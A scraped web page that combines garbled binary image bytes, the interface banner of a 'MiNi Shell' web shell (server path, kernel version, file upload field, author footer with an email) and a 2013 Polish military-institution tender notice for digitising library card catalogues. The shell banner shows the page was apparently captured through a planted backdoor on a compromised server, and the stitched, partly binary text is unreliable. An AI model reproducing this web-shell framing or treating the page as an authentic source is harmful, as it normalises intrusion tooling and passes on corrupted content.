JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130522/84977-N-2013.html

<p class="kh_header"><b>Warszawa: Digitalizacja katalogów kartotek kartkowych CBW ZP_13_2013</b><br>
<b>Numer ogłoszenia: 84977 - 2013; data zamieszczenia: 22.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowe Centrum Edukacji Obywatelskiej , ul. Stefana Banacha 2, 00-909 Warszawa, woj. mazowieckie, tel. 22 6824-913, faks 22 6824559.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wceo.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Digitalizacja katalogów kartotek kartkowych CBW ZP_13_2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje usługę polegającą na zeskanowaniu w siedzibie Wykonawcy oraz udostępnieniu w Internecie w oprogramowaniu dostarczonym przez Wykonawcę i zainstalowanym na serwerze CBW wybranych katalogów kartkowych Centralnej Biblioteki Wojskowej im. Marszałka Józefa Piłsudskiego w Warszawie.
2.	Na zamówienie składają się
1)	 Zeskanowanie wg wymogów kart katalogowych z niżej wymienionych katalogów Centralnej Biblioteki Wojskowej w Warszawie:
a. Kartoteka Piśmiennictwa Wojskowego
b. Katalog rzeczowy
c. Kartoteka biogramów 
Zeskanowane zostaną karty katalogowe znajdujące się w 1214 skrzynkach katalogowych. Przyjęto, że w skrzynce katalogowej ŚREDNIO znajduje się 1200 kart katalogowych. Katalogi mają odrębną strukturę, która ma być odwzorowana w systemie bazodanowym, w układzie ustalonym z CBW.
2)	Dostarczenie oprogramowania bazodanowego przed rozpoczęciem skanowania kart katalogowych w wyznaczonym przez CBW terminie. Wykonawca jest zobowiązany do dostarczenia dokumentacji oprogramowania oraz do doraźnej pomocy w wypadku problemów przy instalacji oprogramowania na serwerze CBW. Wraz z oprogramowaniem Wykonawca dostarcza również podręcznik dotyczący części administracyjnej oprogramowania. CBW zastrzega sobie prawo do modyfikacji interfejsu graficznego oprogramowania bazodanowego widocznego w Internecie. 
3)	 Systematyczne umieszczanie skanów kart w niezmienionej jakości w specjalistycznym oprogramowaniu bazdodanowym dostarczonym przez Wykonawcę (w liczbie nie mniejszej niż 70 skrzynek katalogowych na tydzień) i posadowionym na serwerze CBW. Skany powinny być umieszczone i widoczne w bazie celem ich kontroli i weryfikacji względem oryginału nie później niż 3 dni robocze od zwrotu danej partii skrzynek katalogowych. Udostępnione w Internecie skany kart katalogowych powinny zachować układ poszczególnych, wymienionych wyżej katalogów, a w nich podział na skrzynki katalogowe, jeśli CBW w porozumieniu z Wykonawcą nie zdecyduje inaczej. Skany powinny być dostarczone na dyskach przenośnych, które po zakończeniu prac przejdą na własność CBW jako kopia bezpieczeństwa.
4)	Po zakończeniu realizacji umowy Wykonawca jest zobowiązany do posiadania na własnym nośniku elektronicznym (dysku twardym, macierzy dyskowej, taśmie magnetycznej, magazynie danych) kopii bezpieczeństwa bazy danych oraz skanów przez okres 3 lat.
3.	Parametry skanów:
1)	każda karta katalogowa stanowi odrębny skan
2)	skan zapisany w formacie JPEG, dopuszczalna kompresja 75
3)	skanowanie w skali szarości, głębia 8 bitów
4)	 rozdzielczość 200 dpi
5)	 skan powinien odzwierciedlać rzeczywisty rozmiar obiektu, niedopuszczalne jest skalowanie plików
6)	nazewnictwo skanów zostanie ustalone przez CBW w porozumieniu z Wykonawcą po podpisaniu umowy.
4.	Skanowaniu podlegają wszystkie karty katalogowe znajdujące się w danej skrzynce katalogowej. Zeskanowane mają być również przekładki, jak i karty zastępcze. Z kart powinny być usunięte zszywki, karty połączone sznurkami powinny zostać rozdzielone i zeskanowane, karty złożone-zagięte powinny być rozłożone i zeskanowane w takiej postaci.
5.	Wykonawca w procesie skanowania:
1)	rozkręca skrzynkę wyjmując bolec trzymający karty katalogowe, odkurza skrzynkę oraz karty katalogowe, skanuje karty katalogowe w niezmienionej kolejności (również przekładki oraz karty zastępcze), pomija tekturki znajdujące się na początku i końcu skrzynek katalogowych, jeżeli nie ma na nich żadnych informacji;
2)	z kart katalogowych usuwa zszywki (jeżeli takie się znajdą), rozdziela karty połączone sznurkami, karty złożone-zagięte skanuje po ich rozłożeniu;
3)	nadaje skanowanym kartom katalogowym wraz z przekładkami niepowtarzalne nazwy w plikach i umieszcza w oprogramowaniu bazodanowym; nazwy plików powinny składać się z co najmniej 7 cyfr, nie mogą zawierać liter ani znaków specjalnych;
4)	doprowadza skrzynkę katalogową do stanu pierwotnego wkładając do niej karty katalogowe w oryginalnym ułożeniu jednak bez wiązania lub zszywania kart;
5)	jeśli podczas całego procesu skanowania jakakolwiek z kart ulegnie uszkodzeniu, wykonawca ma obowiązek poinformować o tym fakcie koordynatora i przekazać mu zniszczoną kartę;
6)	jeśli Wykonawca ma wątpliwości jakie działania powinien podjąć ma niezwłocznie skontaktować się z osobą wyznaczoną przez CBW.
6.	Kontrola poprawności wykonywania zamówienia
CBW będzie weryfikował wykonaną pracę kontrolując jakość skanów oraz ich kompletność względem każdej skrzynki katalogowej. Znalezione i zweryfikowane błędy będą powodowały konieczność ponownego zeskanowania, podmienienia przez Wykonawcę zakwestionowanej skrzynki w oprogramowaniu bazodanowym w Internecie oraz ponownej kontroli.
7.	Organizacja pracy
1)	Wykonawca jest zobowiązany odebrać i zwrócić skrzynki katalogowe z Centralnej Biblioteki Wojskowej.
2)	Każdorazowo podczas przekazywania skrzynek Wykonawcy będzie podpisywany Protokół przekazania.
3)	CBW zobowiązana jest do przygotowania do przekazania określonej liczby skrzynek, tak aby zachować ciągłość pracy.
4)	Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień:
CPV 72310000-1 usługi przetwarzania danych CPV 72252000-6 usługi komputerowe w zakresie archiwizowania
Szczegółowy opis we wzorze umowy Załącznik nr 6 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.25.20.00-6, 72.31.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnego ze wzorem - Załącznik nr 2 do SIWZ.;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej 3 (trzy) usługi odpowiadające swoim rodzajem przedmiotowi niniejszego zamówienia (tj. digitalizacji katalogów kartotek kartkowych) tj wykażą 3 zrealizowane przez siebie bazy zawierające zeskanowane katalogi kartkowe polskich bibliotek nie mniejsze niż 50 000 kart katalogowych. W tym Wykonawcy wykażą co najmniej jedną bazę, w której znalazło się co najmniej 500 000 kart katalogowych oraz potwierdzą, że usługi te zostały wykonane należycie;

Zamawiający pod pojęciem  1 usługi rozumie jedną usługę o podanej wartości realizowaną na podstawie jednej umowy, nie dopuszcza się możliwości sumowania kilku usług z umów 
o mniejszych wartościach niż wskazane;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że dysponują:
a)	co najmniej jednym skanerem do luźnych kart o minimalnych parametrach:

Parametr	Funkcja
Przeznaczenie	Masowe oraz automatyczne skanowanie luźnych kart z możliwością podawania ręcznego pojedynczych arkuszy.
Rozdzielczość optyczna 	Minimum 200 dpi
Tryby skanowania	8 bitowa skala szarości
Gramatura przyjmowanego papieru	do 240 g/m2 z uwzględnieniem możliwości skanowania sztywnego, zakurzonego materiału
Formaty obsługiwanych dokumentów	Skaner musi umożliwiać skanowanie sztywnych kart katalogowych o formatach w przedziale od 6 cm x 11 cm do 20 cm na 15 cm.
Zabezpieczenie oryginalnych dokumentów	Skaner musi być wyposażony w paskowy mechanizm transportu kart podczas skanowania oraz w ultradźwiękowy czujnik podwójnych pobrań.
Formaty zapisu	JPG, TIF
Kadrowanie i prostowanie	Skaner musi zwracać obrazy kart w postaci wykadrowanej i wyprostowanej w stosunku do jej krawędzi
Oprogramowanie do skanowania	Oprogramowanie do skanowania musi umożliwiać zapis indeksów w pliku z obrazem lub w pliku tekstowym stowarzyszonym z zeskanowanym obrazem karty.
Gwarancja i serwis	Wykonawca musi posiadać gwarancję serwisową, która w wypadku awarii skanera-rów nie spowoduje opóźnień w pracy.
Do wykazu wymaga się dołączenia specyfikacji technicznej skanera  potwierdzającej spełnienie ww. warunków-parametrów.

b)	co najmniej jednym skanerem płaskim o minimalnych parametrach:
Parametr	Funkcja
Przeznaczenie	Skanowanie pojedynczych luźnych kart
Rozdzielczość optyczna 	Minimum 200 dpi
Tryby skanowania	8 bitowa skala szarości
Format	Minimum A5
Formaty zapisu	JPG, TIF
Oprogramowanie	Oprogramowanie do skanowania musi umożliwiać zapis indeksów w pliku z obrazem lub w pliku tekstowym stowarzyszonym z zeskanowanym obrazem karty.
Funkcje oprogramowania	Oprogramowanie umożliwiające kadrowanie, obracanie, wycinanie, przybliżanie i poziomowanie skanów.
Gwarancja i serwis	Wykonawca musi posiadać gwarancję serwisową, która w wypadku awarii skanera-rów nie spowoduje opóźnień w pracy.
Do wykazu wymaga się dołączenia specyfikacji technicznej skanera  potwierdzającej spełnienie ww. warunków-parametrów.

c)	dysponują oprogramowaniem bazodanowym do prezentacji skanów kart katalogowych w Internecie o minimalnych wymaganiach:
Parametr	Funkcje / Opis
Przeznaczenie	Platforma do przechowywania i prezentacji w Internecie
obrazów kart katalogu kartkowego.
Interfejs	Oprogramowanie musi posiadać interfejs webowy, dostępny w różnych wersjach językowych (co najmniej: polski, angielski) z możliwością samodzielnego tworzenia dodatkowych wersji językowych. Układ kart w interfejsie dostępnym dla użytkownika musi odpowiadać strukturze katalogu fizycznego i uwzględniać indeksy wskazane przez CBW.
Środowisko pracy	Wszystkie moduły oprogramowania muszą pracować w środowiskach Windows oraz Linux.
Modyfikacje interfejsu	Moduł prezentacji katalogu w Internecie musi dawać możliwość modyfikacji parametrów wyświetlania (kolorystyka, układ logiczny, czcionka, itp.) i dostosowania go do wyglądu serwisu głównego CBW. Musi umożliwiać umieszczenie znaków graficznych takich jak logo oraz innych elementów identyfikacji wizualnej.
Funkcje oprogramowania	Webowy interfejs użytkownika oprogramowania musi zapewniać:
- swobodny dostęp użytkowników do zasobów katalogowych, przez przeglądarkę WWW, bez konieczności instalowania dodatkowego oprogramowania po stronie stacji klienckich;
- przejrzystą prezentację struktury katalogu;
- czytelne wyświetlanie obrazów kart oraz wskazanych oraz indeksów z nimi związanych;
- możliwość wyświetlenia poszczególnych kart w powiększeniu;
- możliwość przechodzenia do poszczególnych podstruktur katalogu przez wybranie zakresu kroku oraz jego kierunku (zgodny lub przeciwny do porządku alfabetycznego);
- możliwość przechodzenia do wprost wskazanych zakresów czy podzakresów katalogu;
- możliwość pełno-tekstowego wyszukiwanie obiektów według wprowadzonych indeksów;
- parametryzację liczby wyświetlanych podczas pojedynczego zapytania kart katalogowych;
- chroniony hasłem dostęp do funkcji administracyjnych poprzez interfejs administracyjny;
Webowy interfejs administracyjny musi zapewniać możliwość:
- zdefiniowanie co najmniej 7 indeksów dla każdego obrazu karty;
- wprowadzania nowych oraz edycji istniejących indeksów;
- zdalnego (przez Internet) tworzenia użytkowników oraz grup użytkowników o różnych poziomach uprawnień;
- wykonywania i odzyskiwania kopii bezpieczeństwa;
- ręcznego usuwania i wprowadzania obrazów kart do katalogu, wraz z automatyczną zmianą odpowiednich indeksów np. porządku kart. 
Do wykazu wymaga się dołączenia specyfikacji technicznej oprogramowania  potwierdzającej spełnienie ww. warunków-parametrów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnego ze wzorem - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej przedmiotem zamówienia na kwotę nie mniejszą niż 200 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// www.wceo.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WOJSKOWE CENTRUM EDUKACJI OBYWATELSKIEJ
ul. Stefana Banacha 2 00-909 Warszawa 60.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 09:30, miejsce: WOJSKOWE CENTRUM EDUKACJI OBYWATELSKIEJ KANCELARIA JAWNA POK 313
ul. Stefana Banacha 2 00-909 Warszawa 60.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com